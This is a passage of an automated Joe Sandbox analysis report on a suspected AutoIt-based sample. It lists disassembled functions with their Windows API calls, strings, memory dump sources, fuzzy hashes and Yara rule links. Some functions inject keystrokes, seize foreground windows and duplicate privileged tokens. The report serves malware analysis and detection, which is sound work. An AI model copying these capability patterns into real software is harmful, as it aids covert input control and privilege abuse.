Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D

Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84

Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694

Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00468EC1

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D

Function 00405C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795

Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00425266

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99

Function 00441DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00441DF0

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
Instruction ID: cdab6d828b25e7ec8576945e7c24180a122b150f18df0bf6d50e7f80ea2f144b
Opcode Fuzzy Hash: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
Instruction Fuzzy Hash: C7C04C715500199BD715A754DC95AA8767CAB10705F4040EAB105D105196745B85CF29

Function 0046D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 1f482e499efe4cdbac250247dc780417b0912bf5c3f395d7cd633a9b58f30c2c
Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
Opcode Fuzzy Hash: 1f482e499efe4cdbac250247dc780417b0912bf5c3f395d7cd633a9b58f30c2c
Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B

Function 00DD8C44 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00DD8C59

Memory Dump Source

Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 3083c8a970440cea7feb801ee9245a850a440729a8bd6e9a82d9429536132d00
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 5BE09A7494110DEFDB00DFA8DA4969D7BB4EF04301F1006A1FD0596680DA309A549A62

Function 00DD8C48 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00DD8C59

Memory Dump Source

Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 7dfc37142d194d72c2589021be5c8937a300384febc83de587286e6edc20f2e9
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 2AE0E67494110DDFDB00DFB8DA4D69D7BF4EF04301F100261FD01D2280DA309D509A72

Non-executed Functions

Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
SendMessageW.USER32 ref: 0048CC29
_wcsncpy.LIBCMT ref: 0048CC95
GetKeyState.USER32(00000011), ref: 0048CCB6
GetKeyState.USER32(00000009), ref: 0048CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
GetKeyState.USER32(00000010), ref: 0048CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
SendMessageW.USER32 ref: 0048CD33
SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
SetCapture.USER32(?), ref: 0048CE69
ClientToScreen.USER32(?,?), ref: 0048CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
ReleaseCapture.USER32 ref: 0048CF00
GetCursorPos.USER32(?), ref: 0048CF3A
ScreenToClient.USER32(?,?), ref: 0048CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
SendMessageW.USER32 ref: 0048CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
SendMessageW.USER32 ref: 0048D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
GetCursorPos.USER32(?), ref: 0048D08D
ScreenToClient.USER32(?,?), ref: 0048D09A
GetParent.USER32(?), ref: 0048D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
SendMessageW.USER32 ref: 0048D154
ClientToScreen.USER32(?,?), ref: 0048D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
SendMessageW.USER32 ref: 0048D22F
ClientToScreen.USER32(?,?), ref: 0048D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetWindowLongW.USER32(?,000000F0), ref: 0048D351

Strings

@GUI_DRAGID, xrefs: 0048CE9C
F, xrefs: 0048D235
pD, xrefs: 0048CEAF

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pD
API String ID: 3977979337-2162445630
Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A

Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004171C3
_memset.LIBCMT ref: 00417539
_memmove.LIBCMT ref: 004176AC

Strings

3cA, xrefs: 004523A0
[:<:]], xrefs: 00417479
\b(?=\w), xrefs: 00453769
Q\E, xrefs: 00417FCB
_A, xrefs: 004523CB
[:>:]], xrefs: 00417492
\b(?<=\w), xrefs: 00453773
P\K, xrefs: 00451AB8
]K, xrefs: 00451A22
DEFINE, xrefs: 00452103

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
API String ID: 1357608183-1426331590
Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48

Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 004048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
IsIconic.USER32(?), ref: 0043D66E
ShowWindow.USER32(?,00000009), ref: 0043D67B
SetForegroundWindow.USER32(?), ref: 0043D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
GetCurrentThreadId.KERNEL32 ref: 0043D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
SetForegroundWindow.USER32(?), ref: 0043D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
keybd_event.USER32(00000012,00000000), ref: 0043D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
keybd_event.USER32(00000012,00000000), ref: 0043D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
keybd_event.USER32(00000012,00000000), ref: 0043D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
keybd_event.USER32(00000012,00000000), ref: 0043D71E
SetForegroundWindow.USER32(?), ref: 0043D721
AttachThreadInput.USER32(?,?,00000000), ref: 0043D748

Strings

Shell_TrayWnd, xrefs: 0043D660

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9

Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

_memset.LIBCMT ref: 00458353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
CloseHandle.KERNEL32(?), ref: 004583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
GetProcessWindowStation.USER32 ref: 004583E6
SetProcessWindowStation.USER32(00000000), ref: 004583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A

Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Strings

, xrefs: 00458362
winsta0, xrefs: 004583C8
default, xrefs: 00458405

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 437279cf6668c4de0c45be1f5ff47ec95fcfdbb6353991e64ddc4cd982ce14e0
Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
Opcode Fuzzy Hash: 437279cf6668c4de0c45be1f5ff47ec95fcfdbb6353991e64ddc4cd982ce14e0
Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28

Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
FindClose.KERNEL32(00000000), ref: 0046C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
__swprintf.LIBCMT ref: 0046C890
__swprintf.LIBCMT ref: 0046C8D3

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

__swprintf.LIBCMT ref: 0046C927

Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1

__swprintf.LIBCMT ref: 0046C975

Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B

__swprintf.LIBCMT ref: 0046C9C4
__swprintf.LIBCMT ref: 0046CA13
__swprintf.LIBCMT ref: 0046CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0046C88A
%4d, xrefs: 0046C8CD
%02d, xrefs: 0046C91B, 0046C925, 0046C973, 0046C9C2, 0046CA11, 0046CA60

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66

Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

